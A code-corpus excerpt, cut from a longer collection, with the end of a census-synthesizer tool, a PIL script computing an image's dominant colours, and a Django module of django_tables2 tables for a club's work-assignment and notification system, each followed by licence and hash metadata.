logCB('Finished running queries.\n')
progressCB(100)
def opusHelp():
help = 'This tool will create the person marginals table necessary to\n' \
'run the synthesizer algorithm.\n' \
'\n' \
'PREREQUISITE TO RUNNING THIS TOOL:\n' \
' - run the import_sf3_raw_data_to_db tool\n' \
' - run the import_pums_id_to_bg_id_to_db tool\n' \
'\n'
return help | agpl-3.0 | -6,381,364,979,689,039,000 | 44.365591 | 281 | 0.661214 | false |
luckydonald/shairport-decoder | examples/image-average.py | 1 | 1351 | # -*- coding: utf-8 -*-
__author__ = 'luckydonald'
from luckydonaldUtils.logger import logging # pip install luckydonald-utils
logger = logging.getLogger(__name__)
from PIL import Image
import sys
from luckydonaldUtils.images.color import most_frequent_color
def average_colour(image):
colour_tuple = [None, None, None]
for channel in range(3):
# Get data for one channel at a time
pixels = image.getdata(band=channel)
values = []
for pixel in pixels:
values.append(pixel)
colour_tuple[channel] = sum(values) / len(values)
return tuple(colour_tuple)
def save(name, integer, image=None, color=None):
"""
DEBUG FUNCTION
WITH CAPSLOCK DESCRIPTION
:param name:
:param integer:
:param image:
:param color:
:return:
"""
if image:
image.save(name.replace(".png", "export-{}.png".format(integer)))
if color:
sample = Image.new("RGB", (200, 200,), color)
sample.save(name.replace(".png", "export-{}.png".format(integer)))
picture = "Bildschirmfoto 2015-09-15 um 17.37.49"
path = "/Users/luckydonald/Desktop/{}.png".format(picture)
def main():
image = Image.open(path)
max_colors = 10
#if "mode" in sys.argv:
results = most_frequent_color(image, colors=max_colors)
#result2 = average_colour(image)
for i in range(0, max_colors):
save(path, i+1, color=results[i][1])
if __name__ == "__main__":
main()
| lgpl-3.0 | 7,137,069,983,716,982,000 | 21.147541 | 76 | 0.684678 | false |
hkarl/svpb | arbeitsplan/tables.py | 1 | 41071 | # -*- coding: utf-8 -*-
"""
Collect all the tables and column types relevant for django_tables2 here.
"""
import unicodedata
import django_tables2
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.utils.html import escape, format_html
from django.utils.safestring import mark_safe
from django_tables2.utils import A # alias for Accessor
import models
####################################
# Colum Types
####################################
class RadioButtonTable (django_tables2.Table):
def render_radio(self, fieldname, choices, buttontexts, **kwargs):
if 'bound_row' in kwargs:
record = kwargs['bound_row']._record
if 'record' in kwargs:
record = kwargs['record']
try:
tmp = '\n'.join([
format_html(u"""
<label class="btn {4} {5}">
<input type="radio" name="{0}_{1}" value="{2}"> {3}
</label>
""",
fieldname,
record['id'],
choice[0],
choice[1],
buttontexts[choice[0]],
" active" if record[fieldname] == choice[0] else "",
)
for (counter, choice) in enumerate(choices)])
except TypeError:
tmp = '\n'.join([
format_html(u"""
<label class="btn {4} {5}">
<input type="radio" name="{0}_{1}" value="{2}"> {3}
</label>
""",
fieldname,
record.id,
choice[0],
choice[1],
buttontexts[choice[0]],
" active" if getattr(record,fieldname) == choice[0] else "",
)
for (counter, choice) in enumerate(choices)])
return mark_safe(u"""<div class="btn-group-vertical" data-toggle="buttons">""" +
tmp +
u"""</div>""")
class KontaktColumn(django_tables2.columns.Column):
"""Pass an accessor to a user object,
this will be rendered with first and last name
as well as clickable email link.
"""
def __init__(self, *args, **kwargs):
if (('order_by' not in kwargs) and
('accessor' in kwargs)):
kwargs['order_by'] = (kwargs['accessor']+'.last_name',
kwargs['accessor']+'.first_name',
)
## print kwargs['order_by'], type(kwargs['order_by'])
## print kwargs['accessor'], type(kwargs['accessor'])
super(KontaktColumn, self).__init__(*args, **kwargs)
def render(self, value):
# print value
return mark_safe(u'{1} {2}{0}'.format(
(u' <a href="mailto:{0}">'
u'<span class="glyphicon glyphicon-envelope">'
u'</span></a>'.format(value.email)
if value.email
else ""),
value.first_name,
value.last_name,
))
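# Illustrative sketch (added; not in the original code): a KontaktColumn is used like
# any other django_tables2 column, with its accessor pointing at a User-like object,
# e.g. (hypothetical table definition):
#
#   class MitgliederTable(django_tables2.Table):
#       kontakt = KontaktColumn(accessor='user', verbose_name='Mitglied')
#
# The cell then renders "<first_name> <last_name>" plus a mailto icon whenever the
# user has an email address.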
class DeleteIconColumn(django_tables2.columns.Column):
"""Show a delete icon for a particular entry
"""
urlBase = "/"
def __init__(self, *args, **kwargs):
if "urlBase" in kwargs:
self.urlBase = kwargs.pop("urlBase")
print "kwargs: ", kwargs
super(DeleteIconColumn, self).__init__(*args, **kwargs)
def render(self, value):
# print value, type(value)
return mark_safe(u'<a href="{}/{}">'
u'<span class="glyphicon glyphicon-trash">'
u'</a>'.format(self.urlBase,
(value)),
)
class ValuedCheckBoxColumn(django_tables2.columns.Column):
"""A checkbox column where a pair of values is expected:
name and whether the box is checked or not.
    Control tags (integers, not strings!):
-1: show no field
0: unchecked checkbox
1: checked checkbox
"""
def render(self, value):
if value[0] == -1:
return ""
if len(value) > 2:
text = value[2]
else:
text = ""
return mark_safe(u'<input type="checkbox" value="1" name="' +
escape(value[1]) +
'" ' +
("checked" if value[0]==1 else "") +
'/>' + text
)
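# Illustrative sketch (added; not in the original code): the value handed to a
# ValuedCheckBoxColumn is expected to be a tuple such as
#
#   (1, "checkbox_name")            -> checked box with the given name
#   (0, "checkbox_name")            -> unchecked box
#   (-1, "")                        -> nothing is rendered
#   (1, "checkbox_name", "label")   -> optional third entry rendered as text
#
# ("checkbox_name" and "label" are placeholders, not names used elsewhere in this file.)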
class IntegerEditColumn(django_tables2.columns.Column):
"""A Column type to allow editing of a single integer value
value should be a tuple: first entry the value to display/edit,
second entry the id/name of the inputbox
"""
def render(self, value):
try:
res = format_html('<input type="" value="{}" name="{}" />',
value[0],
value[1],
)
except Exception as e:
# sometimes, we get a None as value; not sure why and when :-/ ?
# print "Exc2: ", e
# print value
res = ""
# print "IEC: ", res
return res
class TextareaInputColumn (django_tables2.columns.Column):
def render(self, value):
# print "render: ", value, self.__dict__
return mark_safe (u'<input class="textinput textInput" id="id_bemerkungVorstand" maxlength="20" name="bemerkungVorstand" placeholder="Bemerkung Vorstand" value="'
+ escape (value) +
u'" type="text" />'
)
class RequiredAssignedColumn (django_tables2.columns.Column):
"""
A column used by the stundenplan survey table.
Renders both required and assigned numbers in one cell.
"""
def render(self, value):
# print value
try:
r = mark_safe(str(value['required']) +
" / " + str(value['zugeteilt']))
except TypeError:
r = ""
return r
class LinkedColumn(django_tables2.columns.Column):
"""
    A column that renders a simple <a href>,
assuming a tuple of values
"""
def render(self, value):
text, link = value
if text:
return mark_safe(u"<a href={0}>{1}</a>".format(link, text))
else:
return "-"
##############################
## Table factories
##############################
def TableFactory (name, attrs, l, meta={}):
"""takes
- a name for the new django_tables2 class
    - a dictionary with column_name: column_types
- a list of data to be used for the table
    returns an instance of the newly created table class, filled with l
"""
metadict = dict(attrs={"class":"paleblue",
"orderable":"True",
# "width":"90%"
})
metadict.update(meta)
attrs['Meta'] = type('Meta',
(),
metadict,
)
klass = type(name, (django_tables2.Table,), attrs)
t = klass(l)
return t
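# Illustrative usage sketch (added; not in the original code); the column names and
# data values below are made up:
#
#   cols = {'gruppe': django_tables2.Column(verbose_name="Aufgabengruppe"),
#           'anzahl': django_tables2.Column(verbose_name="Anzahl")}
#   data = [{'gruppe': 'Platzdienst', 'anzahl': 3, 'id': 1}]
#   table = TableFactory("BeispielTable", cols, data)
#
# i.e. the factory returns a ready-to-render table instance, not the class itself.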
##############################
def NameTableFactory (name, attrs, l, meta=None,
kontakt=None):
"""
    A Factory for django_tables2 with dynamic columns.
    Always adds a Nachname, Vorname column to the given attributes
"""
if kontakt:
nameattrs = {'kontakt': KontaktColumn(
accessor=kontakt[0],
verbose_name=kontakt[1],
empty_values=(),
),
}
else:
nameattrs = {'last_name': django_tables2.Column(verbose_name="Nachname"),
'first_name': django_tables2.Column(verbose_name="Vorname"),
}
nameattrs.update(attrs)
# we need to construct the meta field to ensure that the names are shown correctly:
if not meta:
if kontakt:
meta = {'sequence': ('kontakt',
'...',
)}
else:
meta = {'sequence': ('last_name',
'first_name',
'...')}
return TableFactory(name, nameattrs, l,
meta=meta
)
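# Illustrative sketch (added; not in the original code), with made-up data:
#
#   t = NameTableFactory("SaldenBeispiel",
#                        {'zugeteilt': django_tables2.Column()},
#                        [{'last_name': 'Mustermann', 'first_name': 'Max',
#                          'zugeteilt': 12}])
#
# yields a table whose first two columns are Nachname and Vorname.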
##############################
def StundenplanTableFactory(l, showStunden=True):
"""
A factory to produce a table with aufgaben and uhrzeiten columns.
"""
newattrs = {}
if showStunden:
for i in range(models.Stundenplan.startZeit,
models.Stundenplan.stopZeit+1):
newattrs['u'+str(i)] = RequiredAssignedColumn(
accessor='u'+str(i),
verbose_name=str(i)+'-'+str(i+1)
)
newattrs['aufgabe'] = django_tables2.Column(accessor='aufgabe')
newattrs['gruppe'] = django_tables2.Column(accessor='gruppe',
verbose_name="Aufgabengruppe")
newattrs['gemeldet'] = django_tables2.Column(accessor='gemeldet',
verbose_name="# Meldungen")
newattrs['required'] = django_tables2.Column(accessor='required',
verbose_name="# Anforderungen")
newattrs['zugeteilt'] = django_tables2.Column(accessor='zugeteilt',
verbose_name ="# Zuteilungen")
newattrs['editlink'] = django_tables2.Column(accessor="editlink",
verbose_name="Zuteilen")
newattrs['stundenplanlink'] = django_tables2.Column(accessor="stundenplanlink",
verbose_name="Stundenplan")
t = TableFactory ("Stundenplan",
newattrs, l,
meta = {'sequence': ('aufgabe', 'gruppe', # 'id',
'editlink', 'stundenplanlink',
'required', 'gemeldet', 'zugeteilt',
'...',
)})
return t
def StundenplanEditFactory(l, aufgabe):
"""
    Produce a table with persons as rows and uhrzeiten as columns.
Checkboxes in the uhrzeit columns.
"""
newattrs = {}
    # values obtained from views/StundenplaeneEdit:
newattrs['anzahl'] = IntegerEditColumn(accessor='anzahl',
verbose_name="Anzahl ZUSÄTZLICHE Helfer",
empty_values=(),)
for i in range(models.Stundenplan.startZeit,
models.Stundenplan.stopZeit+1):
# print '----- ', i
try:
benoetigt = aufgabe.stundenplan_set.filter(uhrzeit__exact=i)[0].anzahl
# benoetigt = aufgabe.benoetigte_Anzahl(i)
except Exception as e:
print "eX: ", e
benoetigt = 0
# print benoetigt
zugewiesen = sum([z.zusatzhelfer + 1
for z in aufgabe.zuteilung_set.filter(stundenzuteilung__uhrzeit=i)])
# print zugewiesen
newattrs['u'+str(i)] = ValuedCheckBoxColumn(accessor='u'+str(i),
# verbose_name=str(i)+'-'+str(i+1),
verbose_name=mark_safe('{} - {}'
'<span style="font-weight:normal">'
'<br> ({} / {})'
'</span>'.format(
i, i+1, benoetigt, zugewiesen),
))
return NameTableFactory("StundenplanEdit",
newattrs, l,
meta={'sequence': ('last_name',
'first_name',
'anzahl',
'...')}
)
##############################
class AufgabenTable (django_tables2.Table):
verantwortlicher = KontaktColumn(
accessor="verantwortlich",
verbose_name="Verantwortlicher")
meldungen = django_tables2.Column(
verbose_name="Vorliegende Meldungen",
empty_values=(),
orderable=False,
)
zuteilungen = django_tables2.Column(
verbose_name="Erfolgte Zuteilungen",
empty_values=(),
orderable=False,
)
quickmeldung = django_tables2.Column(
verbose_name="Quickmeldung",
empty_values=(),
orderable=False,
)
def render_meldungen(self, record):
# return record.meldung_set.count()
return record.numMeldungen()
def render_zuteilungen(self, record):
return record.zuteilung_set.count()
def render_quickmeldung(self, record):
user = self.context["request"].user
try:
meldung = record.meldung_set.get(melder=user)
meldung_exists = (meldung.bemerkung != models.Meldung.MODELDEFAULTS['bemerkung'] or
meldung.prefMitglied != models.Meldung.MODELDEFAULTS['prefMitglied'])
except:
meldung_exists = False
return mark_safe('<a href="{}"> <i class="fa fa-hand-o-up fa-fw"></i></a> {}'.format(
reverse('arbeitsplan-quickmeldung', args=[record.id]),
'<i class="fa fa-check fa-fw"></i>' if meldung_exists else "",
))
class Meta:
model = models.Aufgabe
attrs = {"class": "paleblue"}
# fields=("aufgabe", "datum",
# django_tables2.A("verantwortlich.last_name"),
# "gruppe", "anzahl", "bemerkung")
fields = ("gruppe", "aufgabe", "datum",
"stunden",
"anzahl",
"bemerkung",
"verantwortlicher",
"quickmeldung",
)
exclude = ("meldungen", "zuteilungen", )
class AufgabenTableTeamlead (django_tables2.Table):
verantwortlicher = KontaktColumn(
accessor="verantwortlich",
verbose_name="Verantwortlicher")
meldungen = django_tables2.Column(
verbose_name="Vorliegende Meldungen",
empty_values=(),
orderable=False,
)
zuteilungen = django_tables2.Column(
verbose_name="Erfolgte Zuteilungen",
empty_values=(),
orderable=False,
)
def render_meldungen(self, record):
# return record.meldung_set.count()
return record.numMeldungen()
def render_zuteilungen(self, record):
return record.zuteilung_set.count()
class Meta:
model = models.Aufgabe
attrs = {"class": "paleblue"}
# fields=("aufgabe", "datum",
# django_tables2.A("verantwortlich.last_name"),
# "gruppe", "anzahl", "bemerkung")
fields = ("gruppe", "aufgabe", "datum",
"stunden",
"anzahl",
"bemerkung",
"verantwortlicher",
)
exclude = ("meldungen", "zuteilungen", )
class AufgabenTableVorstand(django_tables2.Table):
verantwortlicher = KontaktColumn(
accessor="verantwortlich",
verbose_name="Verantwortlicher")
id = django_tables2.LinkColumn(
'arbeitsplan-aufgabenEdit',
args=[A('pk')],
verbose_name="Editieren/ Löschen")
meldungen = django_tables2.Column(
verbose_name="Vorliegende Meldungen",
empty_values=(),
orderable=False,
)
zuteilungen = django_tables2.Column(
verbose_name="Erfolgte Zuteilungen",
empty_values=(),
orderable=False,
)
fehlende_zuteilungen = django_tables2.Column(
verbose_name="Noch offene Zuteilungen",
empty_values=(),
orderable=False,
)
def render_meldungen(self, record):
# return record.meldung_set.count()
return record.numMeldungen()
def render_zuteilungen(self, record):
return record.zuteilung_set.count()
def render_fehlende_zuteilungen(self, record):
return record.anzahl - record.zuteilung_set.count()
class Meta:
model = models.Aufgabe
attrs = {"class": "paleblue"}
# fields=("aufgabe", "datum",
# django_tables2.A("verantwortlich.last_name"),
# "gruppe", "anzahl", "bemerkung")
fields = ("id",
"gruppe", "aufgabe", "datum",
"stunden",
"anzahl",
"meldungen",
"zuteilungen", "fehlende_zuteilungen",
"bemerkung",
'verantwortlicher',
)
        # TODO: anzahl probably needs to be converted
        # into the number of FREE slots here!?!?
class AufgabengruppeTable(django_tables2.Table):
id = django_tables2.LinkColumn('arbeitsplan-aufgabengruppeEdit',
args=[A('pk')],
verbose_name="Editieren",
)
verantwortlich = KontaktColumn()
class Meta:
model = models.Aufgabengruppe
attrs = {"class": "paleblue"}
fields = ('gruppe', 'verantwortlich', 'bemerkung', 'id', )
# exclude = ('id',)
########################
class StundenplanTable (django_tables2.Table):
id = django_tables2.LinkColumn ('arbeitsplan-stundenplaeneEdit',
args=[A('id'),],
verbose_name="Stundenplan editieren")
aufgabe = django_tables2.Column (accessor='aufgabe')
gruppe = django_tables2.Column (accessor='gruppe__gruppe', verbose_name="Aufgabengruppe")
    u0 = django_tables2.Column (accessor='u0', verbose_name='0-1')
    u1 = django_tables2.Column (accessor='u1', verbose_name='1-2')
    u2 = django_tables2.Column (accessor='u2', verbose_name='2-3')
    u3 = django_tables2.Column (accessor='u3', verbose_name='3-4')
    u4 = django_tables2.Column (accessor='u4', verbose_name='4-5')
    u5 = django_tables2.Column (accessor='u5', verbose_name='5-6')
    u6 = django_tables2.Column (accessor='u6', verbose_name='6-7')
    u7 = django_tables2.Column (accessor='u7', verbose_name='7-8')
    u8 = django_tables2.Column (accessor='u8', verbose_name='8-9')
    u9 = django_tables2.Column (accessor='u9', verbose_name='9-10')
    u10 = django_tables2.Column (accessor='u10', verbose_name='10-11')
    u11 = django_tables2.Column (accessor='u11', verbose_name='11-12')
    u12 = django_tables2.Column (accessor='u12', verbose_name='12-13')
    u13 = django_tables2.Column (accessor='u13', verbose_name='13-14')
    u14 = django_tables2.Column (accessor='u14', verbose_name='14-15')
    u15 = django_tables2.Column (accessor='u15', verbose_name='15-16')
    u16 = django_tables2.Column (accessor='u16', verbose_name='16-17')
    u17 = django_tables2.Column (accessor='u17', verbose_name='17-18')
class Meta:
# model = models.Aufgabe
attrs = {"class": "paleblue"}
# fields = ('aufgabe', 'gruppe', 'id', )
##############################
class ZuteilungTable(django_tables2.Table):
## verantwortlicher = django_tables2.Column(
## accessor="aufgabe.verantwortlich.last_name",
## verbose_name="Verantwortlicher")
verantwortlicher = KontaktColumn(
accessor="aufgabe.kontakt",
verbose_name="Verantwortlicher",
orderable=False,
)
datum = django_tables2.Column(accessor="aufgabe.datum",
verbose_name="Datum")
studenString = django_tables2.Column(
verbose_name="Zeiten",
accessor='stundenString',
)
class Meta:
model = models.Zuteilung
attrs = {"class": "paleblue"}
fields = ("aufgabe", 'verantwortlicher', 'datum',
# 'stundenString',
)
class ZuteilungTableVorstand(django_tables2.Table):
verantwortlicher = KontaktColumn(
accessor="aufgabe.verantwortlich",
verbose_name="Verantwortlicher")
datum = django_tables2.Column(
accessor="aufgabe.datum",
verbose_name="Datum")
ausfuehrer = KontaktColumn(accessor="ausfuehrer",
verbose_name="Ausführer")
deleteColumn = DeleteIconColumn(
urlBase ='/arbeitsplan/zuteilungDelete',
accessor="id",
verbose_name="Löschen")
class Meta:
model = models.Zuteilung
attrs = {"class": "paleblue"}
fields = ("aufgabe", 'verantwortlicher',
'datum', 'ausfuehrer',
'deleteColumn')
##############################
class MeldungListeTable(django_tables2.Table):
"""A table to only display all Meldungen of a user.
"""
aufgabenGruppe = django_tables2.Column(accessor="aufgabe.gruppe.gruppe",
verbose_name="Aufgabengruppe")
aufgabeName = django_tables2.Column(accessor="aufgabe.aufgabe",
verbose_name="Aufgabe")
aufgabenDatum = django_tables2.Column(accessor="aufgabe.datum",
verbose_name="Datum")
class Meta:
model = models.Meldung
attrs = {"class": "paleblue"}
fields = ("aufgabenGruppe",
"aufgabeName",
"aufgabenDatum",
"prefMitglied",
"bemerkung",
)
exclude = ("id", "erstellt", "veraendert",
"prefVorstand", "bemerkungVorstand",
)
class MeldungTable(RadioButtonTable):
"""A table to edit Meldungen.
"""
# id = django_tables2.Column ()
aufgabe = django_tables2.Column(accessor="aufgabe",
verbose_name="Aufgabe")
gruppe = django_tables2.Column(accessor="gruppe",
verbose_name="Aufgabengruppe")
datum = django_tables2.Column(accessor="datum",
verbose_name="Datum")
stunden = django_tables2.Column(accessor="stunden",
verbose_name="Umfang (h)")
prefMitglied = django_tables2.Column(accessor="prefMitglied",
verbose_name="Vorlieben",
empty_values=(),
)
bemerkung = django_tables2.Column(accessor="bemerkung",
verbose_name="Bemerkung",
empty_values=(),
)
anzahl = django_tables2.Column(
verbose_name="Benötigte Helfer",
empty_values=(),
)
meldungen = django_tables2.Column(
verbose_name="Vorliegende Meldungen",
empty_values=(),
)
zuteilungen = django_tables2.Column(
verbose_name="Erfolgte Zuteilungen",
empty_values=(),
)
fehlende_zuteilungen = django_tables2.Column(
verbose_name="Noch offene Zuteilungen",
empty_values=(),
)
def render_aufgabe(self, value, record):
aufgabe = record['aufgabeObjekt']
tooltext = mark_safe(u'Verantwortlicher: {0} {1}{2}'.format(
aufgabe.verantwortlich.first_name,
aufgabe.verantwortlich.last_name,
u', Bemerkung: {0}'.format(
aufgabe.bemerkung) if aufgabe.bemerkung else '',
))
tmp = mark_safe(
u'<div class="tooltip-demo">'
'<a href="{0}"'
'data-toggle="tooltip"'
'title="{2}"'
'>{1}</a></div>'.format(
'#',
value,
tooltext,
)
)
return tmp
def render_prefMitglied(self, value, record):
return self.render_radio(
choices=models.Meldung.PRAEFERENZ,
buttontexts=models.Meldung.PRAEFERENZButtons,
fieldname="prefMitglied",
record=record,
)
def render_bemerkung(self, value, record, bound_row):
# print record
# print bound_row
tmp = format_html(
u"""<textarea class="textinput textInput"
id="id_bemerkung_{0}" name="bemerkung_{0}"
placeholder="Bemerkung eingeben" rows=6>{1}</textarea>""",
str(record['id']),
record['bemerkung'] if record['bemerkung'] else ""
)
return tmp
class Meta:
# model = models.Aufgabe
attrs = {"class": "paleblue"}
fields = ('gruppe', 'aufgabe', 'datum',
'stunden',
'anzahl',
"meldungen",
'bemerkung',
'prefMitglied')
exclude = ("fehlende_zuteilungen", 'zuteilungen')
class MeldungTableVorstand (RadioButtonTable):
aufgabe = django_tables2.Column(accessor="aufgabe",
verbose_name="Aufgabe")
gruppe = django_tables2.Column(accessor="aufgabe.gruppe",
verbose_name="Aufgabengruppe")
datum = django_tables2.Column(accessor="aufgabe.datum",
verbose_name="Datum")
stunden = django_tables2.Column(accessor="aufgabe.stunden",
verbose_name="Umfang (h)")
prefMitglied = django_tables2.Column(accessor="prefMitglied",
verbose_name="Vorlieben Melder",
empty_values=(),
)
bemerkung = django_tables2.Column(accessor="bemerkung",
verbose_name="Bemerkung Melder",
empty_values=(),
)
## melder_last = django_tables2.Column (accessor="melder.last_name",
## verbose_name="Melder Nachname")
## melder_first = django_tables2.Column (accessor="melder.first_name",
## verbose_name="Melder Vorname")
melder = KontaktColumn(accessor="melder",
verbose_name="Melder",
# order_by=("melder.last_name", "melder.first_name"),
)
## bemerkungVorstand = django_tables2.Column (accessor="bemerkungVorstand",
## verbose_name="Bemerkung Vorstand",
## empty_values=(),
## )
bemerkungVorstand = django_tables2.Column(
empty_values=(),
verbose_name="Bemerkungen des Vorstandes")
prefVorstand = django_tables2.Column(
accessor="prefVorstand",
verbose_name="Vorlieben des Vorstandes",
empty_values=(),
)
def render_prefVorstand(self, value, record):
return self.render_radio(
choices=models.Meldung.PRAEFERENZ,
buttontexts=models.Meldung.PRAEFERENZButtons,
fieldname="prefVorstand",
record=record)
def render_bemerkungVorstand (self, value, record):
tmp = format_html (u'<textarea class="textinput textInput" id="id_bemerkungVorstand_{0}" name="bemerkungVorstand_{0}" placeholder="Bemerkung Vorstand" rows=6>{1}</textarea>',
str(record.id),
record.bemerkungVorstand if record.bemerkungVorstand else ""
)
return tmp
class Meta(MeldungTable.Meta):
model = models.Meldung
fields = ('gruppe', 'aufgabe', 'datum', 'stunden',
# 'melder_last', 'melder_first',
'melder',
'bemerkung', 'prefMitglied',
'bemerkungVorstand', 'prefVorstand')
exclude = ('melder_last', 'melder_first',)
##############################
def SaldenTableFactory (l):
attrs = {}
for s in models.Leistung.STATUS:
attrs[s[0]] = LinkedColumn(verbose_name='Leistungs- angabe ' + s[1] + ' (h)')
attrs['zugeteilt'] = LinkedColumn(verbose_name="Zugeteilt insgesamt (h)")
attrs['past'] = django_tables2.Column(
verbose_name="Zuteilungen vergangener Aufgaben (h)")
attrs['future'] = django_tables2.Column(
verbose_name="Zuteilungen zukünftiger Aufgaben (h)")
attrs['nodate'] = django_tables2.Column(
verbose_name="Zuteilungen Aufgaben ohne Datum (h)")
attrs['arbeitslast'] = django_tables2.Column(
verbose_name="Arbeitslast",
accessor="user.mitglied.arbeitslast")
t = NameTableFactory("salden", attrs, l,
kontakt=('user', 'Mitglied'),
meta={'sequence': ('kontakt',
## 'last_name',
## 'first_name',
'arbeitslast',
'zugeteilt',
'past',
'future',
'nodate',
'...')
})
return t
##############################
def ZuteilungsTableFactory (tuple):
l, aufgabenQs = tuple
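    # One checkbox column per Aufgabe; each column header links to the task and
    # shows its hours, group, required vs. already assigned counts, plus a link
    # to the Stundenplan where one exists.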
attrs = {}
attrs['zugeteilt'] = django_tables2.Column(verbose_name=
"Bereits zugeteilt (h)")
attrs['offen'] = django_tables2.Column(verbose_name=
"Noch zuzuteilen (h)")
for a in aufgabenQs:
tag = (unicodedata.normalize('NFKD',
a.aufgabe).encode('ASCII', 'ignore')
)
attrs[tag] = ValuedCheckBoxColumn(
verbose_name=mark_safe((u'<a href="{}">{}</a>, {}h'
'<span style="font-weight:normal">'
u'<br>({})'
u'<br>Benötigt: {}'
u'<br>Zugeteilt: {}'
u'{}'
'</span>'
.format(reverse('arbeitsplan-aufgabenEdit',
args=(a.id,)),
a.aufgabe,
a.stunden,
a.gruppe,
a.anzahl,
a.zuteilung_set.count(),
# the following expression is the same as appears in
# the ZuteilungUebersichtView
# TODO: perhaps move that to class aufgabe, to produce an edit link
# to its stundenplan if it exists?
('<br>' + mark_safe(u'<a href="{0}">Stundenplan</a>'
.format(reverse ('arbeitsplan-stundenplaeneEdit',
args=(a.id,)),
))
if a.has_Stundenplan()
else ''
) + (u"<br><b>UNVOLLSTÄNDIG</b>"
if not a.stundenplan_complete()
else "<br>ok" )
))),
orderable=False)
    # TODO: also include the required and assigned counts in the verbose_name here
t = NameTableFactory('ZuteilungsTable', attrs, l,
kontakt=('mitglied', 'Mitglied'))
return t
##############################
class LeistungTable(django_tables2.Table):
"""
Show the Leistungen of an individual member.
"""
## melder_last = django_tables2.Column (accessor="melder.last_name",
## verbose_name="Melder Nachname")
## melder_first = django_tables2.Column (accessor="melder.first_name",
## verbose_name="Melder Vorname")
aufgabe = django_tables2.Column(accessor="aufgabe.aufgabe",
verbose_name="Aufgabe")
id = django_tables2.LinkColumn('arbeitsplan-leistungDelete',
args=[A('pk')],
verbose_name="Zurückziehen?")
def render_id(self, record):
if ((record.status == models.Leistung.ACK) or
(record.status == models.Leistung.NEG)):
return "---"
else:
return mark_safe(u'<a href="{}">Zurückziehen</a>'.format(
reverse('arbeitsplan-leistungDelete', args=[record.id])
))
class Meta:
model = models.Leistung
attrs = {"class": "paleblue"}
fields = ( # 'melder_last', 'melder_first',
'aufgabe',
'id',
'wann', 'zeit',
'status',
'bemerkung', 'bemerkungVorstand')
class LeistungBearbeitenTable (RadioButtonTable):
def render_bemerkungVorstand (value, bound_row):
        tmp = format_html (u'<textarea class="textinput textInput" id="id_bemerkungVorstand_{0}" name="bemerkungVorstand_{0}" placeholder="Bemerkung Vorstand" rows=6>{1}</textarea>',
str(bound_row._record.id),
bound_row._record.bemerkungVorstand,
)
return tmp
def render_status (self, value, bound_row):
return self.render_radio(bound_row=bound_row,
choices=models.Leistung.STATUS,
buttontexts=models.Leistung.STATUSButtons,
fieldname="status")
bemerkungVorstand = django_tables2.Column(empty_values=(),
verbose_name = "Bemerkungen des Vorstandes")
melder = KontaktColumn()
class Meta:
model = models.Leistung
attrs = {"class": "paleblue"}
exclude = ("erstellt", "veraendert", 'id', 'benachrichtigt')
sequence = ('melder', 'aufgabe', 'wann', 'zeit',
'bemerkung', 'status', 'bemerkungVorstand')
class BaseEmailTable (RadioButtonTable):
anmerkung = django_tables2.Column(empty_values=(),
verbose_name="Individuelle Anmerkung",
)
sendit = django_tables2.Column(verbose_name="Senden?",
accessor="sendit",
orderable=False,
empty_values=(),
)
def render_sendit(value, bound_row):
tmp = format_html(u'<div class="checkbox"> <input name="sendit_{0}" type="checkbox" {1}></div>',
str(bound_row._record.id),
"checked" if bound_row._record.sendit else "",
)
return tmp
def render_anmerkung(value, bound_row):
tmp = format_html (u'<textarea class="textinput textInput" id="id_anmerkung_{0}"'
' name="anmerkung_{0}" placeholder="Individuelle Anmerkung"'
' rows=4>{1}</textarea>',
str(bound_row._record.id),
bound_row._record.anmerkung,
)
return tmp
class LeistungEmailTable(BaseEmailTable):
# a purely computed field:
schonbenachrichtigt = django_tables2.Column (verbose_name="Schon benachrichtigt?",
orderable=False,
empty_values=(),
)
def render_schonbenachrichtigt(value, bound_row):
return ("Ja"
if (bound_row._record.veraendert <
bound_row._record.benachrichtigt)
else "Nein")
melder = KontaktColumn()
class Meta:
model = models.Leistung
attrs = {"class": "paleblue"}
exclude = ("erstellt", "veraendert", 'id', 'benachrichtigt')
sequence = ('melder', 'aufgabe', 'wann', 'zeit',
'bemerkung', 'status', 'bemerkungVorstand',
'schonbenachrichtigt',
'anmerkung', 'sendit'
)
class ZuteilungEmailTable(BaseEmailTable):
user = KontaktColumn(verbose_name="Mitglied")
zuteilungBenachrichtigungNoetig = django_tables2.Column(verbose_name="Nötig?",
orderable=False,
empty_values=(),
)
def render_zuteilungBenachrichtigungNoetig(value, bound_row):
return ("Ja"
if bound_row._record.zuteilungBenachrichtigungNoetig
else "Nein")
class Meta:
model = models.Mitglied
attrs = {"class": "paleblue"}
exclude = ('id',
'mitgliedsnummer',
'zustimmungsDatum',
'geburtsdatum',
'strasse',
'plz',
'gender',
'ort',
'erstbenachrichtigt',
'festnetz',
'mobil',
)
sequence = ('user',
'zuteilungsbenachrichtigung',
'zuteilungBenachrichtigungNoetig',
'anmerkung', 'sendit',
)
class MeldungsAufforderungsEmailTable(BaseEmailTable):
user = KontaktColumn(verbose_name="Mitglied")
numMeldungen = django_tables2.Column(verbose_name="# Meldungen",
orderable=False,
empty_values=(),
)
numZuteilungen = django_tables2.Column(verbose_name="# Zuteilungen",
orderable=False,
empty_values=(),
)
stundenZuteilungen = django_tables2.Column(verbose_name="Zuteilungen (Stunden)",
orderable=False,
empty_values=(),
)
def render_numMeldungen(value, bound_row):
return (bound_row._record.gemeldeteAnzahlAufgaben())
def render_numZuteilungen(value, bound_row):
return (bound_row._record.zugeteilteAufgaben())
def render_stundenZuteilungen(value, bound_row):
return (bound_row._record.zugeteilteStunden())
class Meta:
model = models.Mitglied
attrs = {"class": "paleblue"}
exclude = ('id',
'mitgliedsnummer',
'zustimmungsDatum',
'geburtsdatum',
'strasse',
'plz',
'gender',
'ort',
'erstbenachrichtigt',
'festnetz',
'mobil',
'zuteilungsbenachrichtigung',
'zuteilungBenachrichtigungNoetig',
)
sequence = ('user',
'numMeldungen',
'numZuteilungen',
'stundenZuteilungen',
'anmerkung', 'sendit',
)
class ImpersonateTable(django_tables2.Table):
## first_name = django_tables2.Column (accessor="user.first_name")
## last_name = django_tables2.Column (accessor="user.last_name")
mitgliedsnummer = django_tables2.Column(accessor="mitglied.mitgliedsnummer")
id = django_tables2.LinkColumn('impersonate-start',
args=[A('pk')],
verbose_name="Nutzer darstellen",
)
class Meta:
model = User
attrs = {"class": "paleblue"}
fields = ('first_name',
'last_name',
'mitgliedsnummer',
'id',
)
| apache-2.0 | -1,148,436,846,957,183,600 | 33.7663 | 184 | 0.480138 | false |
